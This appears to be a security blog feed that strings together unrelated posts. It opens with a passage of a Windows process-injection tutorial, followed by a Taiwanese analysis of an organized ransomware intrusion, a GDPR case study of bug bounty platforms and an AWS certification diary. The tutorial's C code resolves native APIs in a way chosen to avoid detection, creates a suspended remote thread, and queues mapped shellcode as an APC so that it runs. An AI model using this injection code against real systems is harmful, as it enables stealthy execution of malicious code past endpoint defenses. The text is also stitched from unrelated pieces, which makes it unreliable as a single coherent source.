There’s a lot going on here, but it’s really pretty simple. RtlExitUserThread is exported by ntdll.dll, so we need the DLL base address first before we can access its exports. We create the Unicode string needed by the LdrGetDllHandle native API call and then call it to get the address of ntdll.dll. With that done, we need to create the ANSI string required by LdrGetProcedureAddress to get the address of the RtlExitUserThread function. Again, notice no suspicious calls to LoadLibrary or GetProcAddress here.
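A sketch of the resolution, with the usual caveat that these Ldr* prototypes are the commonly published, undocumented ones (the ANSI_STRING mirror is defined locally since winternl.h does not expose it):

#include <windows.h>
#include <winternl.h>

typedef struct _SB_ANSI_STRING { USHORT Length; USHORT MaximumLength; PSTR Buffer; } SB_ANSI_STRING;
typedef NTSTATUS(NTAPI* LdrGetDllHandle_t)(PWSTR, PULONG, PUNICODE_STRING, PVOID*);
typedef NTSTATUS(NTAPI* LdrGetProcedureAddress_t)(PVOID, SB_ANSI_STRING*, ULONG, PVOID*);

PVOID ResolveRtlExitUserThread(void)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    LdrGetDllHandle_t pLdrGetDllHandle =
        (LdrGetDllHandle_t)GetProcAddress(ntdll, "LdrGetDllHandle");
    LdrGetProcedureAddress_t pLdrGetProcedureAddress =
        (LdrGetProcedureAddress_t)GetProcAddress(ntdll, "LdrGetProcedureAddress");

    // Counted-string lengths are in bytes, excluding the terminator
    WCHAR dll[] = L"ntdll.dll";
    UNICODE_STRING uDll = { sizeof(dll) - sizeof(WCHAR), sizeof(dll), dll };
    PVOID hDll = NULL;
    pLdrGetDllHandle(NULL, NULL, &uDll, &hDll);

    CHAR fn[] = "RtlExitUserThread";
    SB_ANSI_STRING aFn = { sizeof(fn) - 1, sizeof(fn), fn };
    PVOID pRemoteFunction = NULL;
    pLdrGetProcedureAddress(hDll, &aFn, 0, &pRemoteFunction);
    return pRemoteFunction;
}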

Creating The Thread

Now that we have our thread start address, we can create it in the remote process.

[screenshot: creating the suspended thread with NtCreateThreadEx]

Here we have the call to NtCreateThreadEx that creates the thread in the target process. Note the use of the pRemoteFunction variable, which contains the start address of RtlExitUserThread. Note also that the true argument above is a Boolean value for the CreateSuspended parameter, which means that the thread will be created in a suspended state and will not immediately begin executing. This will give us time to tell it about the shellcode we’d like it to run.
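A fragment of the same sketch; NtCreateThreadEx is undocumented, so the typedef again follows the commonly published definition, and hRemoteProcess/pRemoteFunction come from the earlier steps:

typedef NTSTATUS(NTAPI* NtCreateThreadEx_t)(PHANDLE, ACCESS_MASK, PVOID, HANDLE, PVOID,
                                            PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PVOID);

NtCreateThreadEx_t pNtCreateThreadEx = (NtCreateThreadEx_t)GetProcAddress(
    GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx");

HANDLE hThread = NULL;
// CreateFlags = 0x1 (create suspended): the thread points at RtlExitUserThread but does not run yet
NTSTATUS status = pNtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hRemoteProcess,
                                    pRemoteFunction, NULL, 0x1, 0, 0, 0, NULL);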

Execution

We’re in the home stretch now. The shellcode is in the remote process and we have a thread ready to execute it. We just need to connect the two together. To do that, we will queue an Asynchronous Procedure Call (APC) on the remote thread. APCs are a way of asynchronously letting a thread know that we have work for it to do. Each thread maintains an APC queue. When the thread is next scheduled, it will check that queue and run any APCs that are waiting for it, and then continue with its normal work. In our case, that work will be to run the RtlExitUserThread function and therefore exit gracefully.

[screenshot: queuing the APC with NtQueueApcThread]

Here we see how the thread and our shellcode meet. We use NtQueueApcThread to queue an APC onto the remote thread, using lpRemoteSection to point to the view containing the shellcode we mapped into the remote process earlier. Once the thread is alerted, it will check its APC queue and see our APC waiting for it.
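A fragment sketching that call, with remoteView being the remote mapping from earlier (again an assumption-level reconstruction, not the repo's exact code):

typedef NTSTATUS(NTAPI* NtQueueApcThread_t)(HANDLE, PVOID, PVOID, PVOID, PVOID);

NtQueueApcThread_t pNtQueueApcThread = (NtQueueApcThread_t)GetProcAddress(
    GetModuleHandleA("ntdll.dll"), "NtQueueApcThread");

// The APC "routine" is simply the remote view of the section, i.e. the shellcode itself
NTSTATUS status = pNtQueueApcThread(hThread, remoteView, NULL, NULL, NULL);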

[screenshot: alerting the thread with NtAlertResumeThread]

A quick call to NtAlertResumeThread and the thread is alerted and runs our shellcode. Which of course pops the obligatory calc.
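Sketched the same way:

typedef NTSTATUS(NTAPI* NtAlertResumeThread_t)(HANDLE, PULONG);

NtAlertResumeThread_t pNtAlertResumeThread = (NtAlertResumeThread_t)GetProcAddress(
    GetModuleHandleA("ntdll.dll"), "NtAlertResumeThread");

ULONG previousSuspendCount = 0;
// Resuming the thread alerted makes it drain its APC queue (running the shellcode),
// then fall through to RtlExitUserThread for a clean exit
pNtAlertResumeThread(hThread, &previousSuspendCount);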

[screenshot: calc.exe launched by the shellcode]

Conclusion

I thought this was a neat injection method, with some quirks I hadn’t seen before, and I enjoyed porting it over to C and learning the concepts behind it in more detail. Hopefully others will find this useful as well.

Thanks again to b33f, Rasta, Adamant, and AsaurusRex for their help!

The Enemy Is Not Ransomware, but Organized Hackers

20 August 2020 at 16:00

Foreword

Hacking incidents have always been part of the real world; they are just rarely disclosed in full. This year, several major operators of critical infrastructure (Critical Information Infrastructure Protection, CIIP) in Taiwan, as well as Taiwan-based multinational companies, suffered serious security incidents. We would like to briefly discuss the core issues behind these incidents that enterprises truly need to think about and take seriously.

Enterprises face organized hackers, not just ransomware

Perhaps because ransomware grabs more attention, the media likes to frame the major threats enterprises have faced in recent years under ransomware headlines. In reality, ransomware is just one tool in the attack chain, and encryption is only one means of extortion; stealing sensitive data is another. Since we did not take part in the investigation of these incidents, we will rely solely on publicly disclosed information to examine what concrete steps an enterprise can take against this kind of threat.

According to what the Investigation Bureau of the Ministry of Justice shared at the iThome 2020 security conference:

In this attack, the hackers first broke into the company via web servers, employee computers, and similar footholds, lurked and probed for a long time, then stole account credentials and reached the AD server. In the early morning hours they tampered with Group Policy Objects (GPO) and planted the lc.tmp malware on internal servers. Once employees came to work and booted their computers, the machines immediately applied the tampered GPO and, following its instructions, automatically loaded the ransomware into memory and executed it.

After being hit by ransomware, an enterprise's first instinct is often to ask why the antivirus or endpoint protection did not stop it. The reality is that when an enterprise faces a targeted attack (Advanced Persistent Threat, APT), the attacker will have studied how to evade its defenses and monitoring. What an enterprise should think about is a defensive line, or an even more comprehensive protection strategy, rather than relying on any single security product or service.

From the description above, we can identify several problems:

  1. The web server had an exploitable vulnerability, which may have allowed the attacker to take over the host and move laterally from it. Possible causes include:
    • The system never underwent high-intensity penetration testing or regular vulnerability scanning
    • It is a legacy system that can no longer be patched (built on outdated frameworks or languages) or is no longer maintained by the vendor
    • It was a one-off campaign or test site that was not taken offline per procedure afterwards, becoming a hole in the enterprise's defenses
    • It fell outside the enterprise's inventoried protection scope (e.g., no WAF deployed in front of it)
  2. From employee computers or the web server, the attackers could hop step by step to the AD server. Possible problems include:
    • Network segmentation is lax, e.g., not segmented according to the importance of data or systems
    • Communication between servers in the same segment is poorly controlled, with no restrictions on important servers' ports or source IP addresses
    • Systems contain weaknesses that can be exploited to gain privileges
  3. GPOs were tampered with in the early morning hours: the final problem is an untimely response (including personnel mishandling alerts). For important systems with centralized management privileges, such as AD servers and asset management software, beyond strong controls on privileged accounts (e.g., OTP), an enterprise should also alert on behaviors such as "anomalous account logins", "anomalous accounts added to groups", "normal accounts logging in at unusual hours", and "newly created scheduled tasks or GPOs"; and it should define different SLAs for responding to and handling each kind of alert according to the importance of the asset.

You need a more comprehensive, objective-driven view of your security posture

In our red team engagements over the past three years, we have used the information assets most critical to an enterprise's operations as the target and simulated the attack patterns of organized hackers: external reconnaissance, gaining access to external systems, lateral movement, steadily taking over more internal servers while escalating privileges and cracking passwords, and finally reaching the enterprise-designated critical assets to complete the exercise scenario. Through this kind of high-intensity, precise exercise, an enterprise not only learns the exact paths by which it can be compromised, but can also review the shortcomings above and keep improving.

We believe that as long as your enterprise is important enough (important to hackers, not merely in your own estimation), organized attacks will never stop! Only by continuously finding your own weaknesses and raising the strength of your defenses can you truly reduce risk.

As for third-party supply chain security and how to formulate a more complete security strategy, we will find time to cover them separately.

Bug Bounty Platforms vs. GDPR: A Case Study

22 July 2020 at 00:00

What Do Bug Bounty Platforms Store About Their Hackers?

I do care a lot about data protection and privacy things. I’ve also been in the situation where a bug bounty platform was able to track me down due to an incident, which was the initial trigger to ask myself:

How did they do it? And do I know what these platforms store about me and how they protect this (my) data? Not really. So why not create a little case study to find out what data they process?

One utility that comes in quite handy when trying to get this kind of information (at least for Europeans) is the General Data Protection Regulation (GDPR). The law’s main intention is to give people an extensive right to access and restrict their personal data. Although GDPR is a law of the European Union, it is extra-territorial in scope. So as soon as a company collects data about a European citizen/resident, the company is automatically required to comply with GDPR. This is the case for all bug bounty platforms that I am currently registered on. They probably cover 98% of the world-wide market: HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter.

Spoiler: All of them have to be GDPR-compliant, but not all seem to have proper processes in place to address GDPR requests.

Creating an Even Playing Field

To create an even playing field, I’ve sent out the same GDPR request to all bug bounty platforms. Since the scenario should be as realistic and real-world as possible, no platform was informed beforehand that the request, or their answer to it, would be part of a study.

  • All platforms were given the same questions, which should cover most of their GDPR response processes (see Art. 15 GDPR).
  • All platforms were given the same email aliases to include in their responses.
  • All platforms were asked to hand over a full copy of my personal data.
  • All platforms were given a deadline of one month to respond to the request. Given the increasing COVID situation back in April, all platforms were offered an extension of the deadline (as per Art. 12 par. 3 GDPR).

Analyzing the Results

First of all, to compare responses that differ widely in style, completeness, accuracy, and thoroughness, I’ve decided to only count answers that are part of the official response. Follow-up discussions after the official response are not considered, because accepting those might create advantages across competitors. This should give a clear understanding of how thoroughly each platform reads and answers the GDPR request.

Instead of going with a kudos (points) system, I’ve decided to use a “traffic light” rating:

Indicator Expectation
Green     All good, everything provided, expectations met.
Orange    Improvable, at least one (obvious) piece of information is missing, or only implicitly answered.
Red       Left out, missing a substantial amount of data or a significant data point, and/or unmet expectations.

This light system is then applied to the different GDPR questions, with points derived either from the questions themselves or from the data provided.

Results Overview

To give you a quick overview of how the different platforms performed, here’s a summary showing the light indicators. (The colored indicator icons do not reproduce in this text version; see the detailed response evaluations below for each rating.)

Question HackerOne Bugcrowd Synack Intigriti Zerocopter
Did the platform meet the deadline?
(Art. 12 par. 3 GDPR)
Did the platform explicitly validate my identity for all provided email addresses?
(Art. 12 par. 6 GDPR)
Did the platform hand over the results for free?
(Art. 12 par. 5 GDPR)
Did the platform provide a full copy of my data?
(Art. 15 par. 3 GDPR)
Is the provided data accurate?
(Art. 5 par. 1 (d) GDPR)
Specific question: Which personal data about me is stored and/or processed by you?
(Art. 15 par. 1 (b) GDPR)
Specific question: What is the purpose of processing this data?
(Art. 15 par. 1 (a) GDPR)
Specific question: Who has received or will receive my personal data (including recipients in third countries and international organizations)?
(Art. 15 par. 1 (c) GDPR)
Specific question: If the personal data wasn’t supplied directly by me, where does it originate from?
(Art. 15 par. 1 (g) GDPR)
Specific question: If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR?
(Art. 15 par. 2 GDPR and Art. 46 GDPR)

Detailed Answers

HackerOne

Request sent out: 01st April 2020
Response received: 30th April 2020
Response style: Email with attachment
Sample of their response: [screenshot not reproduced]

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. A copy of the VPN access logs/packet dumps was/were not provided.

However, since this is not a general feature, I do not consider this to be a significant data point, but still a missing one.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & last name, email address, IP addresses, phone number, social identities (Twitter, Facebook, LinkedIn), address, shirt size, bio, website, payment information, VPN access & packet log HackerOne provided a quite extensive list of IP addresses (both IPv4 and IPv6) that I have used, but based on the provided dataset it is not possible to say when they started recording/how long those are retained.

HackerOne explicitly mentioned that they are actively logging VPN packets for specific programs. However, they currently do not have any ability to search in it for personal data (it’s also not used for anything according to HackerOne)
What is the purpose of processing this data? Operate our Services, fulfill our contractual obligations in our service contracts with customers, to review and enforce compliance with our terms, guidelines, and policies, To analyze the use of the Services in order to understand how we can improve our content and service offerings and products, For administrative and other business purposes, Matching finders to customer programs -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Zendesk, PayPal, Slack, Intercom, Coinbase, CurrencyCloud, Sterling While analyzing the provided dataset, I noticed that the list was missing a specific third-party called “TripActions”, which is used to book everything around live hacking events. This is a missing data point, but it’s also only a non-general one, so the indicator is only orange.

HackerOne added the data point as a result of this study.
If the personal data wasn’t supplied directly by me, where does it originate from? HackerOne does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? This question wasn’t answered as part of the official response. I’ve notified HackerOne about the missing information afterwards, and they’ve provided the following:

Vendors must undergo due diligence as required by GDPR, and where applicable, model clauses are in place.

Remarks

HackerOne provided an automated and tool-friendly report. While the primary information was summarized in an email, I’ve received quite a huge JSON file, which was quite easily parsable using your preferred scripting language. However, if a non-technical person would receive the data this way, they’d probably have issues getting useful information out of it.

Bugcrowd

Request sent out: 1st April 2020
Response received: 17th April 2020
Response style: Email with a screenshot of an Excel table
Sample of their response: [screenshot not reproduced]

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? No identity validation was performed. I’ve sent the request to their official support channel, but there was no explicit validation to verify it’s really me, for neither of my provided email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. Bugcrowd provided a screenshot of what looks like an Excel file with a little information on it. In fact, the screenshot you can see above is not even a sample but their complete response.
However, the provided data is not complete since it misses a lot of data points that can be found on the researcher portal, such as a history of authenticated devices (IP addresses; see your sessions on your Bugcrowd profile), my ISC2 membership number, and everything around identity verification.

There might be more data points, such as logs collected through the proxies or VPN endpoints required by some programs, but no information was provided about that.

Bugcrowd neither provided anything about the other given email addresses, nor denied having anything related to them.
Is the provided data accurate? No. The provided data isn’t accurate. Address information, as well as email addresses and payment information are super old (it does not reflect my current Bugcrowd settings), which indicates that Bugcrowd stores more than they’ve provided.
Which personal data about me is stored and/or processed by you? First & last name, address, shirt size, country code, LinkedIn profile, GooglePlus address, previous email address, PayPal email address, website, current IP sign-in, bank information, and the Payoneer ID This was only implicitly answered through the provided copy of my data.

As mentioned before, it seems like there is a significant amount of information missing.
What is the purpose of processing this data? - This question wasn’t answered.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? - This question wasn’t answered.
If the personal data wasn’t supplied directly by me, where does it originate from? - This question wasn’t answered.
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This question wasn’t answered.

Remarks

The “copy of my data” was essentially the screenshot of the Excel file, as shown above. I was astonished about the compactness of the answer and asked again to answer all the provided questions as per GDPR. What followed was quite a long discussion with the responsible personnel at Bugcrowd. I’ve mentioned more than once that the provided data is inaccurate and incomplete and that they’ve left out most of the questions, which I have a right by law to get an answer to. Still, they insisted that all answers were GDPR-compliant and complete.

I’ve also offered them an extension of the deadline in case they needed more time to evaluate all questions. However, Bugcrowd did not want to take the extension. The discussion ended with the following answer on 17th April:

We’ve done more to respond to you that any other single GDPR request we’ve ever received since the law was passed. We’ve done so during a global pandemic when I think everyone would agree that the world has far more important issues that it is facing. I need to now turn back to those things.

I’ve given up at that point.

Synack

Request sent out: 25th March 2020
Response received: 3rd July 2020
Response style: Email with a collection of PDFs, DOCXs, XLSXs
Sample of their response: [screenshot not reproduced]

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, with an extension of 2 months. Synack explicitly requested the extension.
Did the platform explicitly validate my identity for all provided email addresses? No. I’ve sent the initial request via their official support channel, but no further identity verification was done.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Very likely not. Synack uses a VPN solution called “LaunchPoint” (or “LaunchPoint+”), which every participant must go through when testing targets. What they know, at a minimum, is when I am connected to the VPN, which target I am connected to, and how long I am connected to it. However, neither a connection log nor a full dump was provided as part of the data copy.

The same applies to the system called “TUPOC”, which was not mentioned.

Synack neither provided anything about the other given email addresses, nor denied having anything related to them.

Since I do consider these to be significant data points in the context of Synack that weren’t provided, the indicator is red
Is the provided data accurate? Yes. The data that was provided is accurate, though.
Which personal data about me is stored and/or processed by you? Identity information: full name, location, nationality, date of birth, age, photograph, passport or other unique ID number, LinkedIn Profile, Twitter handle, website or blog, relevant certifications, passport details (including number, expiry data, issuing country), Twitter handle and Github handle

Taxation information: W-BEN tax form information, including personal tax number

Account information: Synack Platform username and password, log information, record of agreement to the Synack Platform agreements (ie terms of use, code of conduct, insider trading policy and privacy policy) and vulnerability submission data;

Contact details: physical address, phone number, and email address

Financial information: bank account details (name of bank, BIC/SWIFT, account type, IBAN number), PayPal account details and payment history for vulnerability submissions

Data with respect to your engagement on the Synack Red Team: Helpdesk communications with Synack, survey response information, data relating to the vulnerabilities you submitted through the Synack Platform and data related to your work on the Synack Platform
Compared to the provided data dump, a few pieces of information are missing: last visited date, last clicks on link tracking in emails, browser type and version, operating system, and gender are not mentioned, but are still processed.

“Log information” in the context of “Account information”, and “data related to your work on the Synack Platform” in the context of “Data with respect to your engagement on the Synack Red Team”, are too vague, since they could mean anything.

There is no mention of LaunchPoint, LaunchPoint+, or TUPOC details.

Since I do consider these to be significant data points in the context of Synack, the indicator is red.
What is the purpose of processing this data? Recruitment, including screening of educational and professional background data prior to and during the course of the interviewing process and engagement, including carrying out background checks (where permitted under applicable law).

Compliance with all relevant legal, regulatory and administrative obligations

The administration of payments, special awards and benefits, the management, and the reimbursement of expenses.

Management of researchers

Maintaining and ensuring the communication between Synack and the researchers.

Monitoring researcher compliance with Synack policies

Maintaining the security of Synack’s network customer information
A really positive aspect of this answer is that Synack included the retention times of each data point.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Cloud storage providers (Amazon Web Services and Google), identification verification providers, payment processors (including PayPal), customer service software providers, communication platforms and messaging platform to allow us to process your customer support tickets and messages, customers, background search firms, applicant tracking system firm. Synack referred to their right to mostly only name “categories of third-parties” except for AWS and Google. While this shows some transparency issues, it is still legal to do so.
If the personal data wasn’t supplied directly by me, where does it originate from? Synack does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? Synack engages third-parties in connection with the operation of Synack’s crowdsourced penetration testing business. To the extent your personal data is stored by these third- party providers, they store your personal data in either the European Economic Area or the United States. The only thing Synack states here is that data is stored in the EEA or the US, but the storage itself is not a safeguard. Therefore the indicator is red.

Remarks

The communication process with Synack was rather slow because it seems like it takes them some time to get information from different vendors.

Update 23rd July 2020:
One document was lost in the conversations with Synack, which turns a couple of their points from red to green. The document was digitally signed, and due to the added proofs, I can confirm that it has been signed within the deadline set for their GDPR request. The document itself tries to answer the specific questions, but there are some inconsistencies compared to the also attached copy of the privacy policy (in terms of data points being named in one but not the other document), which made it quite hard to create a unique list of data points. However, I’ve still updated the table for Synack accordingly.

Intigriti

Request sent out: 07th April 2020
Response received: 04th May 2020
Response style: Email with PDF and JSON attachments.
Sample of their response: [screenshot not reproduced]

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes. Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & lastname, address, phone number, email address, website address, Twitter handle, LinkedIn page, shirt size, passport data, email conversation history, accepted program invites, payment information (banking and PayPal), payout history, IP address history of successful logins, history of accepted program terms and conditions, followed programs, reputation tracking, the time when a submission has been viewed.

Data categories processed: User profile information, Identification history information, Personal preference information, Communication preference information, Public preference information, Payment methods, Payout information, Platform reputation information, Program application information, Program credential information, Program invite information, Program reputation information, Program TAC acceptance information, Submission information, Support requests, Commercial requests, Program preference information, Mail group subscription information, CVR Download information, Demo request information, Testimonial information, Contact request information.
I couldn’t find any missing data points.

A long, long time ago, Intigriti had a VPN solution enabled for some of their customers, but I haven’t seen it active anymore since then, so I do not consider this data point anymore.
What is the purpose of processing this data? Purpose: Public profile display, Customer relationship management, Identification & authorization, Payout transaction processing, Bookkeeping, Identity checking, Preference management, Researcher support & community management, Submission creation & management, Submission triaging, Submission handling by company, Program credential handling, Program inviting, Program application handling, Status reporting, Reactive notification mail sending, Pro-active notification mail sending, Platform logging & performance analysis. -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Intercom, Mailerlite, Google Cloud Services, Amazon Web Services, Atlas, Onfido, Several payment providers (TransferWise, PayPal, Pioneer), business accounting software (Yuki), Intigriti staff, Intigriti customers, encrypted backup storage (unnamed), Amazon SES. I’ve noticed a little contradiction in their report: while saying data is transferred to these parties (which includes third-country companies such as Google and Amazon), they also included a “Data Transfer” section saying “We do not transfer any personal information to a third country.”

After asking for clarification, Intigriti told me that they’re only hosting in the Europe region with regard to AWS and Google.
If the personal data wasn’t supplied directly by me, where does it originate from? Intigriti does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “We will ensure that any transfer of personal data to countries outside of the European Economic Area will take place pursuant to the appropriate safeguards.”

However, “appropriate safeguards” are not defined.

Remarks

Intigriti provided the most well-written and structured report of all queried platforms, allowing a non-technical reader to get all the necessary information quickly. In addition to that, a bundle of JSON files were provided to read in all data programmatically.

Zerocopter

Request sent out: 14th April 2020
Response received: 12th May 2020
Response style: Email with PDF
Sample of their response: [screenshot not reproduced]

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes Zerocopter validated all email addresses that I’ve mentioned in my request by asking personal questions about the account in question and by letting me send emails with randomly generated strings from each address.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First-, last name, country of residence, bio, email address, passport details, company address, payment details, email conversations, VPN log data (retained for one month), metadata about website visits (such as IP addresses, browser type, date and time), personal information as part of security reports, time spent on pages, contact information with Zerocopter themselves such as provided through email, marketing information (through newsletters). I couldn’t find any missing data points.
What is the purpose of processing this data? Optimisation Website, Application, Services, and provision of information, Implementation of the agreement between you and Zerocopter (maintaining contact) -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Some data might be transferred outside the European Economic Area, but only with my consent, unless it is required for agreement implementation between Zerocopter and me, if there is an obligation to transmit it to government agencies, a training event is held, or the business gets reorganized. Zerocopter did not explicitly name any of these third-parties, except for “HubSpot”.
If the personal data wasn’t supplied directly by me, where does it originate from? Zerocopter does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “ These third parties (processors) process your personal data exclusively within our assignment and we conclude processor agreements with these third parties which are compliant with the requirements of GDPR (or its Netherlands ratification AVG)”.

Remarks

For the largest part, Zerocopter only cited their privacy policy, which is a bit hard to read for non-legal people.

Conclusion

For me, this small study holds a couple of interesting findings that might or might not surprise you:

  • In general, European bug bounty platforms like Intigriti and Zerocopter seem to do better, or at least to be better prepared for incoming GDPR requests, than their US competitors.
  • Bugcrowd and Synack seem to lack a couple of processes to adequately address GDPR requests, which unfortunately also includes proper identity verification.
  • Compared to Bugcrowd and Synack, HackerOne did quite well, considering they are also US-based. So being a US platform is no excuse for not providing a proper GDPR response.
  • None of the platforms has explicitly and adequately described the safeguards required from their partners to protect personal data. HackerOne has handed over this data after their official response, Intigriti and Zerocopter have not explicitly answered that question. However, both have (vague) statements about it in their corresponding privacy policies. This point does not seem to be a priority for the platforms, or it’s probably a rather rarely asked question.

See you next year ;-)

AWS Certification Trifecta

28 June 2020 at 11:20

 

 

When the dust settled here’s what I was left with 😛

Date: Monday 05/04/2020 – 1800 hrs
Thoughts: “You should be embarrassed at how severely deficient you are in practical cloud knowledge.”

Background

This is exactly how all my journeys begin (inside my head), typically being judgmental and unfairly harsh on myself. That evening I started to research the cloud market share of Amazon, Azure, and Google. It confirmed what I suspected, with AWS leading (~34%), Azure at roughly half of AWS (~17%), Google at (~6%), and the “others” accounting for the rest. Note: although Azure owns half of AWS in market share percentage, their annual growth (62%) is double that of AWS (33%). I would start with AWS.

Now where do I begin? I reviewed their site listing all the certifications and proposed paths to achieve them. Obviously the infosec in my veins wanted to go directly for the AWS Security Specialty, but I decided not to do that. Why? I figured I would be cheating myself. I would start at the foundational level and progressively work towards the Security Specialty. To appreciate the view, so to speak. Security Specialty would be my end goal.

I had fumbled my way through deploying AWS workloads previously. I had used EC2 before (didn’t know what it stood for or anything beyond that; a VM in the cloud was the depth of my understanding), and S3 was cloud storage (that I constantly read about being misconfigured, leading to data exposure).

As always, there’s absolutely zero pressure on me. Only the pressure of myself 😅 which is probably magnitudes worse and more intense than what anyone from the outside could inflict on me.


AWS Certified Cloud Practitioner CLF-C01

The next day I began researching Cloud Practitioner. This involves a ton of sophisticated research, better known as Google 🤣, in addition to trolling all related Reddit threads that I can find. This is how I narrow down the best materials to prepare with and what to avoid. 99% of my questions have already been answered.

After the scavenger hunt I felt like I could probably pass this one without doing any studying at all. Sometimes I have to get outside of my own head. Not sure why I have all the confidence, but it’s there (for no reason in this case) and sometimes it burns me (keep reading).

I sped through the Linux Academy Practitioner course in 3 days. It was mostly review and everything you would expect for a foundational course. Some of the topics:

    • What is the cloud & what they’re made of
    • IAM Users, Groups, Roles
    • VPCs
    • EC2
    • S3
    • Cloudfront & DNS
    • AWS Billing

Date: Monday 05/09/2020 – 0800 hrs

From initial thought, it’s 5 days later. Exam scheduled for 1800 hrs. I’m excited but nervous, unsure what to expect. The course prepared me well and the exam felt easy. I knew by the last question I had definitely gotten enough points to pass. I clicked next on the last question to end the exam. AWS, in a horrible ploy, forces you to answer a survey before providing you the result.

I PASSED! You have to wait for a day or two to get the official notice that has a numeric score.


AWS Certified Solutions Architect – Associate SAA-C01

I clapped for myself but didn’t feel like I had done much. Practitioner is labeled foundational for a reason. Now it was time to aim for a bigger target. Solutions Architect wouldn’t be easy; it would take a whole heap of studying to clear it. I followed a similar approach going through the Linux Academy Solutions Architect Associate course.

Funny how the brain works, because although Practitioner was easy, it still gave me a chip on my shoulder going into this. Pick a post on Solutions Architect Associate and you’ll hear the pain, how tough it was, how it was the most challenging cert of folks’ lives. I know from CISSP not to listen to this. I’m not sure if folks don’t fully prepare, or just feel better about themselves exaggerating the complexity after passing to continue the horror stories. Maybe to impose some of the fear they had onto others who are coming behind them? One thing about me: I get tired of studying for the same thing quickly. There’s no way I would/could ever study for a cert for 5 months, 6 months, a year. Yeah-Freaking-Right.

The cool thing about AWS is that all the certifications are built upon the foundation. No matter which one you go for, it’s pretty much going deeper into the usage and capabilities of the relevant services. I chose to sit for C01; although C02 was recently released, I wasn’t going to risk being a live beta tester, as I was concerned about the newer exam’s stability. As I write this, C01 is officially dead in 3 days, on July 1 2020; then all candidates will only have C02. Good luck 🤣.

Date: Monday 05/14/2020 – 0800 hrs

5 days after Practitioner (10 days total elapsed time from initial thought)

Okay, I told you to keep reading 😂 I wish somebody would have stopped me. Since no one did, the universe had to step in. In a cocky rage I took the exam after studying for only 5 days. Clicking through the survey, I was heartbroken: I had FAILED, and I really deserved it. Who the hell did I think I was?

This is typically the time where you punch yourself and call yourself stupid. This hurt me more than it should have. I was pissed at myself. For not taking enough time to study, sure, but the real hurt was because I couldn’t will myself to pass even with minimal studying. LMAO. (WTF Bro) Here’s what I woke up to the next day.

What 🤬 I only missed it by 20 points. FML. That made it worse.

You BIG Dummy!

Okay. I picked myself up and scheduled my retake for exactly 2 weeks out. After seeing that score, I felt like if I could have retaken it the next day, I would have passed (again, idk why; maybe that’s my way of dealing with failure, going even further balls to the wall 🤣). The mandatory 2 weeks felt like forever. I was studying at least 6 hrs a day on weekdays and sun-up to sun-down on weekends. Nothing and no one could get any of my time. Besides this, the only other cert I ever had to retake was CRTP. It humbled me and fueled me even more.

I figured I needed to learn from an alternative source, so I went to AcloudGuru’s course, which I felt was really light compared to Linux Academy. The last week I found this Udemy course. Stephane Maarek, the instructor, is the 🐐 Thank You sir! In hindsight I could have used this alone to pass the exam. It was that good. Here’s another review I found useful while preparing for my retake. Thank you Jayendra 💗

Date: Monday 05/28/2020 – 0800 hrs

14 days after my 1st Solutions Architect Associate attempt (24 days total elapsed time from initial thought)

I felt pretty confident this time (justified this time). I realized how much I didn’t know after this go-around, and how maybe I didn’t deserve the 700 the first time. I was definitely gunning for a perfect exam 😂. And I forgot to mention: when you pass any AWS cert you get 50% off the next, so failing the first attempt totally screwed up my financial efficiency; I had to pay full price for this one. I PASSED. But did you get the perfect score 🤔 I definitely didn’t feel like there was ANY question I didn’t know the answer to. Here’s what I woke up to the next day.

God knew not to give me a perfect score! It probably would have done more harm than good 😂 I was very proud of my score. I ASSAULTED/CRUSHED/ANNIHILATED THAT EXAM. TEACH YOU WHO YOU’RE DEALING WITH 👊🏾 This is how I was feeling at the moment!

[GIF via GIPHY]


Amazon AWS Certified Security SCS C01

I needed a break, so I took a weekend off. Come Monday I was right back in the grind 💪🏾 I wished Stephane had created a course for the Security Specialty, but he didn’t 😞 so I went through the Linux Academy course. After that, I bought John Bonso’s course at tutorialsdojo.

Listen. LISTEN. 🗣🔊 LISTEN. The length of these questions is in-freaking-sane. I remember one night losing track of time, completing only like 20 questions while over 2 hours had elapsed. It quickly negged me out. I love reading, but my gosh these were monsters and the scenarios were ridiculous. I was like, bump this, I’m not sure I really even want this thing that bad.

